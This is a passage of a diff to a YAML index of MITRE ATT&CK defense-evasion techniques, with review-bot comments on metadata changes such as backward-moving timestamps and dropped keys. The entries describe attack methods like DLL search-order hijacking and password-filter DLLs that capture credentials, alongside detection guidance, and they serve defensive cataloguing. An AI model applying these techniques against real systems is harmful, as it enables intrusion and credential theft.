There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
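Review bot: this hunk and the next rewrite the whole T1556.002 object mainly because the key order changed (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` all move below `description`), while the substantive changes are a new `modified` value and a spec version bump. If the index generator does not already serialize keys in a stable order, sorting them before writing would keep future resync diffs small enough to audit.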
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
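Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1556.002 and is not re-added anywhere in the reordered object, while the same key survives unchanged for T1562.009, T1542.005, T1218.004 and T1055.003 in this diff. Confirm this is an upstream change to the technique rather than a loss during the reorder, and check whether anything that renders a permissions column from these index files copes with the key being absent.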
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
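Review bot: `x_mitre_version` for T1202 goes 1.1 → 1.2, the description gains Scriptrunner.exe and three new references (`Bleeping Computer - Scriptrunner.exe`, `Secure Team - Scriptrunner.exe`, `SS64`), and `Liran Ravich, CardinalOps` is added as a contributor, but the hunk is hard to audit because the unchanged lines were also reordered (`x_mitre_platforms`, `x_mitre_domains`, `description`, `modified`, `name`, `x_mitre_detection`, `kill_chain_phases` all move). Please confirm in the PR that T1202 was taken verbatim from upstream; from the diff alone it is not possible to see that nothing beyond the description, references and contributors changed.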
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
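Review bot: `description: |-` becomes `description: |+` for T1562. `|-` strips the trailing newline whereas `|+` keeps every trailing newline, so the parsed description string now ends with one or more newline characters. Anything that renders these descriptions into the CSV or markdown indexes may pick up trailing blank lines; if the extra newlines are not intended, restore `|-` or trim the string before serializing. The merge of the former third paragraph into the second, with the new `Google Cloud Mandiant UNC3886 2024` citation, reads as an upstream rewrite and is fine.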
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
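Review bot: the description string of the new `Google Cloud Mandiant UNC3886 2024` reference starts with a leading space inside the quotes (`" Punsaen Boonyakarn, ...`), which no other reference in this file has; trim it to match the sibling entries. The same hunk moves `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` earlier in the object and drops `spec_version: '2.1'` outright, and that removal recurs for every technique in this patch, so a one-line explanation in the PR description (for instance that the generator no longer emits the STIX `spec_version` key) would save future readers from wondering whether it was intentional.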
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
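Review bot: `modified` for T1055.003 moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:22:50.800Z`. A regeneration that lowers a last-modified timestamp usually means the data was taken from an older snapshot or from a different field, and the same backward move appears further down for T1055 (2023-05-09 to 2023-03-30), T1205 (2022-11-08 to 2022-10-19), T1218.002 (2022-05-11 to 2022-03-11), T1599.001 (2021-04-29 to 2020-10-21) and T1553.003 (2022-05-24 to 2022-05-05). Please confirm these values against the upstream ATT&CK objects before merging, since any downstream tooling that keys on `modified` will treat the regenerated entries as older than what it already has.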
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
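Review bot: T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with nothing replacing them, so the entry no longer records which ATT&CK spec it follows, whereas T1562 earlier in the patch keeps `x_mitre_attack_spec_version: 3.2.0` after the same cleanup. T1218.002 and T1599.001 further down drop both keys the same way. If the upstream objects genuinely carry no `x_mitre_attack_spec_version`, consider having the generator emit the key with the version it was produced against, so consumers can rely on it being present on every technique.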
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
